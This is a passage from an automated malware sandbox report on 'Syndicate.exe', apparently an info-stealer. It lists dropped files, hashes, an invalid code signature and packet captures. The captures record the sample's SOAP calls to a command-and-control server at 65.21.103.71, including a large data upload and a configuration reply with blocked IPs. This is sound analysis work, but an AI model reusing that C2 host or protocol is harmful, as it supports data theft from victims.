SHA-512: F8176C814016D4962693A55A84D2BCC26EE01DE822E76B3D3A6B0ADD48382F8D76B5576742BBCAD16A7779C602B435150C0EBDDE1B1ECBFFD6702ECEFE87133B
Malicious: false
Preview:GAOBCVIQIJEAUPWDPRZCCBNOLIBVRPPLZPNDXMXWAHTVVUJJRUSFIWRMMSRKOQHCYSYUBMSXZLUDXPNKIPJHNLIKYINEELPXFAGZSNBZUDCHHIXCDHGYSSWPBQTJTTGUSVAKXUCDJBHFKRHEGHIIDQIBNMNBPTCUQXVDKMCQLDDYJEQLPYWFIVRSVCHHZMWWVQSPTEOWKFBQOCSQTIVDEMIEGVVFLVGTQYKHFAQIQIDWGOQCFBYXUBCCAADXTEQWFNWFUUEWWCZWKOPSJAPHFWQQPXLGACJBTIMAPLNZIUQMQYDMTEGLQKPQSZAOUAAZHEFQNKZLRIVEYLQBXOYRAYPVETHTPJWTKBAQMFVCQHILYBXXCIJUSRNECDEBAPQPACKYMONEQAVFVJSLJHMSFLODHAMDEOOQLMHKTRONKXRUSJGZNIPSFDBPUGOOQDGXVUMBHIHMJBJURQUZFOGURXHYACJUXKOHRQKRDYOEUCWNOZMYOMEIECSMGRXADFNSGHNEYHTEUZESWUPBBTWHMAAHATGKEMQJZGUKFHMOPJNWIZHMNPENYBXIYIQQAAAPIDUTGVYULURYREYTCNKILPPERQGQZJOXIUVLLDJBKFXUJTGVBMXJXFCOCDEASKYTKWQYKXJPQPYIMVFTRDRIZGWDHSNPUPGXIZLQHXDLMDNRJWXSZBGUTMSTDCUAYDTGXGFEGTPPNOUDQYIUIRVWYSBPWRTNAHWZOJNZBMFUMOBETTVAJIKGCUOZZNFQXGHJMEETOIEJZISKBKYAFTPYJUBCNCNXVOJQLDZBVOEERMNSHPDRPHBKXUPBSMXTNRSKCXXOGLQOGPAAXIHATAVXMPGBBSIKATHNAZZHCOKHGTBSCMZLDTZSIPNGBQAQVBLOEZNNOCGBGKUDVAVPXMJZWAFTYFQUZALBMQWWTFBKYRIAXMCLPBVGGEVXGVKQOKGLWBYOFWLKNSBXJMTWCKOJNEQGGGMZAEJRHKRITMKM
C:\Users\user\AppData\Local\Temp\tmpF1BE.tmpProcess: C:\Users\user\Desktop\Syndicate.exe
File Type: ASCII text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 1026
Entropy (8bit): 4.6969712158039245
Copyright Joe Security LLC 2021 Page 19 of 27
Encrypted: false
SSDEEP: 24:zDLHcjI8IQ6sNUYzo1jfRRMF6zzC3ZzNTWx7M00:zDL4ImUYzebRR66C3Z0JMR
MD5: 31CD00400A977C512B9F1AF51F2A5F90
SHA1: 3A6B9ED88BD73091D5685A51CB4C8870315C4A81
SHA-256: E01ADE9C56AF2361A5ADC05ADE2F5727DF1B80311A0FDC6F15B2E0FFFACC9067
SHA-512: 0521ED245FA8F46DE9502CD53F5A50B01B4E83983CC6D9DE0CF02E54D2825C1C26A748CC27E24633DA1171CE0309323235ECF7EB536D4058214D7618794CF2FA
Malicious: false
Preview:PWCCAWLGRESZQJYMKOMIHTZVFVPFCSAZVTKGMPWIGSDMTLFZQLHJERDPYZCJGFCRLISWNBAMIMDXCWDVGVLWLRBEVYOOPHYWACKPZXSURGSIFWTFUJKLSAQNAJEWDLUIKFHXLUAMUDGRAVFMICAHEZBIIEGWGAVVJHMHSIBGNLEHYVSOKQMYABDYCPEBOGBMYUCIGVRGYYQRAYNYHAIBMHOTRIZLLYBECMXTCFUOVXXHSEMIUWSBDHOZIZZUXFTLKXXNEMXBKLCQDPKVZNOMDYUYJRWCVILZVJDNNBMPTNOFSKRQTILJRXTKDNUIYSQCAOPCQKTXYXPPGZDZOQYLGYFPFIWNBSQZXYABPTNBJQNBZEETJSFXZNHXBRWUHOMCZAGZQJLNPMZFALBBPHBIXZHLBTBJLTUHPUYVUDWDFJANSIIDJVMUYLPZPYGAJWMTOHGILQWHKJDQUWMTSWIBVVZGAHCNWIFZNGNERRKMSIVXWXEXRZZEWYASCIYJYCOOBWRTNZELPWKFVZKZIBGQBLGCTSTNAJSWPHYJCQSYZVFRYFSRAVVXJIOHQCNVEOIMWPEAVCJLBHRUKDHJWPFMXAKTZVQCOUKYCBZFWBREKKHOHZVNMMJZGWIZEYRAIKTHMJRCWVWKNMJNSZHSDRUZSQOJKCTOSNGKOKEAWUIQNIYHWKIIDHKQIJWCSGRRLEVUTENXSNNVDVYDJTIWYNCAZIEBXMIROLIBTLMGEUOCECFFWLENTJSVHFKQHKAPBXQAJJSUOUSFCBQTHCFYZGSVVAUPLQELRWLXRCZSUSFUBCORCWMJPUNHTEEYODSFGJFTDZLLXMQYMIHIZXOYGABIAWYSBWLAJSCKBWGJBVMMJKBKLUHULJIUHQXIXESAUTNVVZNKMIVIOHPPQAWTQSEHTQMIWNPRZRETXZHRGWOTGIEHCCSGIUCKCIFCQPTAJOFCIMYSMCOPGASEEYCNQLXCNRAPQUSQXTWPKPYCQXPE
C:\Users\user\AppData\Local\Temp\tmpF1BE.tmp
C:\Users\user\AppData\Local\Temp\tmpF1BF.tmpProcess: C:\Users\user\Desktop\Syndicate.exe
File Type: ASCII text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 1026
Entropy (8bit): 4.702247102869977
Encrypted: false
SSDEEP: 24:GwASqxXUeo2spEcwb4NnVEBb2Ag1EY9TDqVEQXZvnIx+:nAD1U6+Lwb4dV42x1EIeVlXZ/5
MD5: B734D7226D90E4FD8228EE89C7DD26DA
SHA1: EDA7F371036A56A0DE687FF97B01F355C5060846
SHA-256: ED3AE18072D12A2B031864F502B3DA672B4D4FA8743BEC8ADE114460F53C24D6
SHA-512: D11ED908D0473A6BEA78D56D0E46FC05DAE642C6ED2F6D60F7859BB25C596CDAA79CC7883FEA5C175A2C04BD176943FF45670B19D6A55B3D5F29FAF40A19AC20
Malicious: false
Preview:QCFWYSKMHARLAFTMDAYCDPDNVLLXYAHYJQVDDKWMWZXTODMVQHOWYAKZGPKJEHLDEADLWAOYFHCRBONQYOLNJKXLXXPSVNNBUMGSSHSRYIKKLNWBJSSZQFZBFWIPYYALBWYXPUCHCBPPPRVICZHAAXDBSBDAFSJSLRPZCKMILDLKTZJTTJWTRDUXPIOSWYRPJKVLJAGHSGEPPERRAQLAJLIRGZPORRNBHIKYMYWHJJKNXIQOPDJPXFLFPWXDCSZYFDTACTIFVHTTSPLEYMJQGMJBZKBTPKCSRPHSAJZDKKKDYFDICXMYAQSFGBCKRXTFXXUYCXPOOHXIGGOZQXUOJXGUHUEOJLEOQQRFQRNQSWAOWAWOUVFMKBPTZVBCGRCYEHPXUWCDBHICKJYVGTNPPMEWNTSWYZNREIVBOXSICNBJXTOOMRYUPEHBVWMTIZHWLGFFTIUYFBQKZOWLOZMSGJFBUHXKMGISFGKCABOUUUQJAUODQPPYPQJGLZVADLCCGHPBEUWSDDXYCCQVTRQWCEJDTNAGHKGJTRWVAQBQJBUQWMJRXXASIQFFIUCPKMEXTJTVBDCBEYZDLKHCHQXMUBNRVRITBTYGULZYWAXVJAXNQEPONBFIAUWZCXQYHHPHZWKKUTNXAQELCSUFKXKKQLLKNVNOREOWTEVCFHSUGPNRMAPAFPTHPGPAJPOCFBZXTIYQYUSEJFOUEZDUJSRXDHTOZAMMNCCIXWLXFQZALVARMPTDBNFJAJUMFQAHUJVWMEIDRIMZQXYHMCNBVLONHTHCXFAKSQBBXFBBFYSTIWNRKGOIHMIHZKIQSYCSFIRGLYFATERWSKAZLTFNMKHFVBLMXNERMNYZHBEYHNFPIPCGHZZMBNNYITUETKSXMZHNSGROLAGIITATFDCBZCBLYQHHYFPBDWGCTQNYPHDHFBNVEJJDIVMSPKDXKQBUNSMLJDVGOKQUEVKEVEUUSGEQJDKGYLPIDXNBIPBAJRUU
C:\Users\user\AppData\Local\Temp\tmpF1C0.tmpProcess: C:\Users\user\Desktop\Syndicate.exe
File Type: ASCII text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 1026
Entropy (8bit): 4.6980379859154695
Encrypted: false
SSDEEP: 24:A1cICRRGh4wXAyCbnhdKjiaeD+ICv1Ka42P:0cIYRGh4wXyny+VEV42P
MD5: 4E3F4BE1B97FA984F75F11D95B1C2602
SHA1: C34EB2BF97AB4B0032A4BB92B9579B00514DC211
SHA-256: 59176791FFEBB86CD28FF283F163F0A44BEC33273968AADFF3852F383F07D1E1
SHA-512: DD9C44C85AF10ED76900A2FE9289D28D99FB56CBE5385A46E485BE0F97A3EA7B119FE3235F334D84FA15902EA78F43C334424240B834D272849356421A33B207
Malicious: false
Preview:QNCYCDFIJJXXFOBBXUZWOFUQSSNNMFYIDILWLHTAZLHLJONMCDCVNCVXWBMUFJZAFKEEPNXZDYZJCSPOAMORBEETMACWAZGGTOXJCHTDTMVBHRPTLBCYZORACSZOXJZRVMZHVEOODGKJRRYLCKUFAYOXVKWJMPRNRNPZEPQZONIUXPPIZMRKSMXAPWYEFYYMMEVAXOVEZSPBEJXENHLIHXQMWJRNUJFILZBVCHZGSXSCZDLUJYAIEMFAKMGZRGVOACZDULPMTHUOBPJBMVYTDCJXFDPUECDSDSUEAFWGDFBMYZQEFBBNQHNIAZWLZMSUFKUWZABFJATHSHQHDIAVRZTRYPZQQLMBOTPFBQKJDTMNKBJAFYFAYVOMBSWHOBUQSYEBLHEDVKQNGPPYYDHQTDNFMKYJBWQRTHICJRWSTTREOOBMYGBUCHFDYMGHVLBDKHYWLYGTEDTHOSIOSXLWGESBKVKNDNLHUVLLUBIQJIAQTVGZHJBFRBPSLHGPZGCZVLETNOSXQRRSQJBXTKDASBHEZXYVHEIZXGANNJHMIMQYHDFNNALGZYXGCPYFPYZSCSPKUMVVWIRDXSMSGEKGZNWWWVXGTXWDKSTXVLHRXFELLCWRSIFVJLOUVSMBXWSHSPQZUHHYPANCFLOAYKMMBXMIXYFORAFUEVNVTQFWGSCJZEOHRNDHLLFYLQFOZXARKDDGYWBOFNOCUJWZALYSUEUOMQHCYTBHPYEDSSAKKDECQAZIWWHOJPIMNYUNNZPDBNECENBWFCTSDYUMRCXDFCNYFVTFUUWRGBGWUGZTYCTBQVNAVSKZCNNOJNXDSQUTVJLYJMHLQJJBPEDZOTOVFCJLUVQVIEYTFNEEDHKMXTEKAIHTQBGOPUGKWWNQTAGBHAUZVKMHWVZTYKYOWJYFEGCIPREWFGAHFXDMSFOAYRDJCTSGYNSDSELZDMIXRNFGOTYBEUKLAOAVMHJKZEBGSCQHGCDZCAAGIVBGWEQA
Copyright Joe Security LLC 2021 Page 20 of 27
Static File Info
GeneralFile type: PE32 executable (console) Intel 80386, for MS Wind
ows
Entropy (8bit): 7.791069579498099
TrID: Win32 Executable (generic) a (10002005/4) 99.96%Generic Win/DOS Executable (2004/3) 0.02%DOS Executable Generic (2002/1) 0.02%Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: Syndicate.exe
File size: 2300520
MD5: 1ca3d04a1c28f573e0a31c49881c8c4a
SHA1: 30a0a21660c49c0a44c981396c435483efad865e
SHA256: 196e6323c5ffd2105f1159a77c1b1cb583deb9d27875232f5fae5635a39a637d
SHA512: aeede683d62f29b2e24f7352ff296c7249c3eccc6a6b3c165b060454a0704cf52b1137dbcdb24b7045c526f6a6e6b70f79935ed78866b552b7338cec38e6be64
SSDEEP: 49152:s4BxRE/3VvQCzbS6Sr+WL0WCq5wj3oLqJLmO+Fm4TZDetWmyxOFZVIW:sUEfRQob6N63oss8ISV7
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G.................0..x..........X.N.. ........@.. ........................l.......#...@................................
File Icon
Icon Hash: 44f0e8e86071b254
GeneralEntrypoint: 0x8ea058
Entrypoint Section: .boot
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows cui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: TERMINAL_SERVER_AWARE, DYNAMIC_BASE
Time Stamp: 0x911E9747 [Mon Feb 25 09:52:07 2047 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 4328f7206db519cd4e82283211d98e83
Signature Valid: false
Signature Issuer: CN=COMODO RSA Extended Validation Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
Signature Validation Error: The digital signature of the object did not verify
Error Number: -2146869232
Not Before, Not After 10/6/2019 5:00:00 PM 10/6/2022 4:59:59 PM
Subject Chain CN=Telegram FZ-LLC, O=Telegram FZ-LLC, STREET="Business Central Towers, Tower A, Office 2301 2303", L=Dubai, S=Dubai, C=AE, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=AE, SERIALNUMBER=94349
Version: 3
Thumbprint MD5: 034F2391B5CE85A7D99BC43FE240F70F
Static PE Info
Authenticode Signature
Copyright Joe Security LLC 2021 Page 21 of 27
Network Port Distribution
Thumbprint SHA-1: D4C89B25D3E92D05B44BC32C0CBFD7693613F3EE
Thumbprint SHA-256: E31F1B9C3DDD0EDEFDF96F85B8FFD1DB976573BB262CC6E1154AD8FDC4D55449
Serial: 1F3216F428F850BE2C66CAA056F6D821
Name Virtual Address Virtual Size Raw Size Xored PE ZLIB Complexity File Type Entropy Characteristics
0x2000 0x18000 0x8c00 False 0.993359375 data 7.98687941304 IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
0x1a000 0x3df84 0x3400 False 0.990159254808 data 7.96015124239 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
0x58000 0xc 0x400 False 0.625 data 5.20647410606 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.vm_sec 0x5a000 0x4000 0x4000 False 0.180236816406 data 3.16443092163 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.idata 0x5e000 0x2000 0x400 False 0.087890625 data 0.643057928191 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc 0x60000 0x3dfa2 0x3e000 False 0.0679419732863 data 3.64616757736 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.themida 0x9e000 0x44c000 0x0 unknown unknown unknown unknown IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.boot 0x4ea000 0x1e0c00 0x1e0c00 False 0.9944006354 data 7.95367837591 IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Language of compilation system Country where language is spoken Map
English United States
Network Behavior
Timestamp Source IP Dest IP Trans ID OP Code Name Type Class
Jul 25, 2021 11:46:16.103388071 CEST 192.168.2.3 8.8.8.8 0x76c7 Standard query (0)
api.ip.sb A (IP address) IN (0x0001)
Entrypoint Preview
Data Directories
Sections
Resources
Imports
Version Infos
Possible Origin
TCP Packets
UDP Packets
DNS Queries
Copyright Joe Security LLC 2021 Page 22 of 27
Jul 25, 2021 11:46:16.156313896 CEST 192.168.2.3 8.8.8.8 0xce80 Standard query (0)
api.ip.sb A (IP address) IN (0x0001)
Timestamp Source IP Dest IP Trans ID OP Code Name Type Class
Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class
Jul 25, 2021 11:46:16.144757032 CEST
8.8.8.8 192.168.2.3 0x76c7 No error (0) api.ip.sb api.ip.sb.cdn.cloudflare.net
CNAME (Canonical name)
IN (0x0001)
Jul 25, 2021 11:46:16.192190886 CEST
8.8.8.8 192.168.2.3 0xce80 No error (0) api.ip.sb api.ip.sb.cdn.cloudflare.net
CNAME (Canonical name)
IN (0x0001)
65.21.103.71:56458
Session ID Source IP Source Port Destination IP Destination Port Process
0 192.168.2.3 49730 65.21.103.71 56458 C:\Users\user\Desktop\Syndicate.exe
TimestampkBytestransferred Direction Data
Jul 25, 2021 11:46:09.341821909 CEST
1075 OUT POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 65.21.103.71:56458Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Jul 25, 2021 11:46:09.385097027 CEST
1075 IN HTTP/1.1 100 Continue
Jul 25, 2021 11:46:09.431422949 CEST
1078 IN HTTP/1.1 200 OKContent-Length: 212Content-Type: text/xml; charset=utf-8Server: Microsoft-HTTPAPI/2.0Date: Sun, 25 Jul 2021 09:46:09 GMTData Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
Jul 25, 2021 11:46:15.610199928 CEST
1097 OUT POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 65.21.103.71:56458Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Jul 25, 2021 11:46:15.653594017 CEST
1097 IN HTTP/1.1 100 Continue
DNS Answers
HTTP Request Dependency Graph
HTTP Packets
Copyright Joe Security LLC 2021 Page 23 of 27
Jul 25, 2021 11:46:15.769517899 CEST
1099 IN HTTP/1.1 200 OKContent-Length: 5470Content-Type: text/xml; charset=utf-8Server: Microsoft-HTTPAPI/2.0Date: Sun, 25 Jul 2021 09:46:15 GMTData Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 3e 3c 62 3a 73 74 72 69 6e 67 3e 31 38 36 2e 30 2e 34 39 2e 32 30 34 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 31 38 33 2e 31 37 31 2e 31 35 38 2e 32 31 39 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 32 32 33 2e 32 30 34 2e 32 33 35 2e 35 35 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 37 31 2e 32 33 32 2e 35 34 2e 32 32 32 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 31 37 39 2e 36 2e 32 30 31 2e 32 33 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 31 38 32 2e 31 2e 31 32 31 2e 32 30 34 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 31 30 38 2e 34 31 2e 31 30 34 2e 39 35 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 34 39 2e 31 34 34 2e 33 36 2e 32 32 33 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 32 30 30 2e 32 33 36 2e 32 35 31 2e 38 37 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 31 39 31 2e 31 39 33 2e 39 34 2e 31 34 37 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 31 37 33 2e 37 35 2e 32 31 38 2e 39 36 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 34 37 2e 31 33 2e 35 35 2e 36 32 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 39 32 2e 38 31 2e 32 31 37 2e 34 30 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 36 39 2e 31 37 34 2e 31 34 35 2e 31 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 39 35 2e 31 37 38 2e 31 37 34 2e 31 34 33 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 31 38 36 2e 38 34 2e 32 32 2e 31 31 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 31 36 32 2e 32 32 37 2e 31 35 31 2e 31 35 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 39 34 2e 31 32 39 2e 31 39 34 2e 33 39 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 38 35 2e 32 30 32 2e 33 36 2e 34 30 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 34 36 2e 36 35 2e 32 33 34 2e 31 33 37 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 31 38 30 2e 31 38 30 2e 34 31 2e 35 39 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 2f 61 3a 42 6c 6f 63 6b 65 64 49 50 3e 3c 61 3a 4f 62 6a 65 63 74 34 3e 74 72 75 65 3c 2f 61 3a 4f 62 6a 65 63 74 34 3e 3c 61 3a 4f 62 6a 65 63 74 36 3e 66 61 6c 73 65 3c 2f 61 3a 4f 62 6a 65 63 74 36 3e 3c 61 3a 53 63 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>186.0.49.204</b:string><b:string>183.171.158.219</b:string><b:string>223.204.235.55</b:string><b:string>71.232.54.222</b:string><b:string>179.6.201.23</b:string><b:string>182.1.121.204</b:string><b:string>108.41.104.95</b:string><b:string>49.144.36.223</b:string><b:string>200.236.251.87</b:string><b:string>191.193.94.147</b:string><b:string>173.75.218.96</b:string><b:string>47.13.55.62</b:string><b:string>92.81.217.40</b:string><b:string>69.174.145.1</b:string><b:string>95.178.174.143</b:string><b:string>186.84.22.11</b:string><b:string>162.227.151.15</b:string><b:string>94.129.194.39</b:string><b:string>85.202.36.40</b:string><b:string>46.65.234.137</b:string><b:string>180.180.41.59</b:string></a:BlockedIP><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:Sc
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
1 192.168.2.3 49733 65.21.103.71 56458 C:\Users\user\Desktop\Syndicate.exe
TimestampkBytestransferred Direction Data
Jul 25, 2021 11:46:21.311783075 CEST
1109 OUT POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 65.21.103.71:56458Content-Length: 1152391Expect: 100-continueAccept-Encoding: gzip, deflate
Jul 25, 2021 11:46:21.354468107 CEST
1110 IN HTTP/1.1 100 Continue
Jul 25, 2021 11:46:21.831581116 CEST
2278 IN HTTP/1.1 200 OKContent-Length: 147Content-Type: text/xml; charset=utf-8Server: Microsoft-HTTPAPI/2.0Date: Sun, 25 Jul 2021 09:46:21 GMTData Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
Jul 25, 2021 11:46:21.835778952 CEST
2278 OUT POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 65.21.103.71:56458Content-Length: 1152383Expect: 100-continueAccept-Encoding: gzip, deflate
Jul 25, 2021 11:46:21.877815962 CEST
2278 IN HTTP/1.1 100 Continue
Copyright Joe Security LLC 2021 Page 24 of 27
Code Manipulations
Statistics
Behavior
Click to jump to process
System Behavior
Jul 25, 2021 11:46:22.808171034 CEST
3965 IN HTTP/1.1 200 OKContent-Length: 261Content-Type: text/xml; charset=utf-8Server: Microsoft-HTTPAPI/2.0Date: Sun, 25 Jul 2021 09:46:21 GMTData Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>
TimestampkBytestransferred Direction Data
File ActivitiesFile Activities
Start time: 11:45:57
Start date: 25/07/2021
Path: C:\Users\user\Desktop\Syndicate.exe
Wow64 process (32bit): true
